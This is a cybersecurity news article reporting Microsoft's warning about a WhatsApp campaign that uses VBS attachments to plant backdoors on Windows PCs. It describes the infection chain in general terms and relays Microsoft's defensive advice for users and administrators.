Microsoft is warning of a malicious WhatsApp campaign delivering malware-laced attachments capable of planting backdoors on targeted Windows system users PCs.
Microsoft said attackers have been running a campaign since late February 2026 and are using malicious executable WhatsApp attachments that contain a Visual Basic Script file to gain persistence and remote access on targeted Windows systems.
The technique described in a Microsoft Defender researcher blog post published Tuesday, is not tied to a WhatsApp software flaw, rather preys on the gullibility of the recipient to open the attached file.
Microsoft described the threat as a social-engineering chain where the victim runs a malicious file. Attackers then leverage a living-off-the-land attack, where adversaries abuse standard Windows components — including Visual Basic Script (VBS), cmd.exe, User Account Control settings, registry changes and unsigned MSI installers.
Research did not make the distinction between exposure risk when it comes to the Windows users running the WhatsApp Desktop app or the WhatsApp Web application.
The attack begins with social engineering. A user must manually open and execute the malicious VBS file received via a WhatsApp message. Without this first click, the infection chain cannot begin. The goal is to turn a normal Windows laptop into a machine the attackers can revisit with elevated privileges, quietly control and use to pull down more tools or steal data.
Unpacking the Crime
Once that first script runs, the attackers try to make the PC easier to control and harder to clean. Microsoft said the malware hides its activity by creating hidden folders in C:\ProgramData and renaming legitimate Windows tools such as curl.exe and bitsadmin.exe so they blend in with normal system activity. It then pulls next-stage payloads from cloud services including AWS, Tencent Cloud and Backblaze B2, tampers with UAC and registry settings, and drops unsigned MSI packages such as Setup.msi, WinRAR.msi, LinkPoint.msi and AnyDesk.msi.
Practical advice from Microsoft is; Do not open unexpected WhatsApp attachments, even if they appear to come from someone you know.
For IT teams, Microsoft is advising administrators to restrict privileges for script code in Windows. Additionally, administrators are advised to turn on endpoint protections such as cloud-delivered protection, tamper protection, and put EDR in block mode to block obfuscated scripts and VBScript-launched downloads.
Related research from Trend Micro reported in October 2025 that a Windows-focused WhatsApp campaign in Brazil used malicious ZIP attachments and active WhatsApp Web sessions to spread to more contacts. Dutch intelligence also said in March 2026 that Russian state actors were targeting Signal and WhatsApp users with phishing and social engineering to take over accounts.
The throughline is these may be different techniques, but it’s the same lesson: messaging apps are increasingly being used as the lure, the delivery channel or the compromise path.
Shaun Nichols is an IT news journalist. He has spent nearly 20 years covering the industry with a specialty in the cybersecurity
Illustration by Mariia Shalabaieva on Unsplash
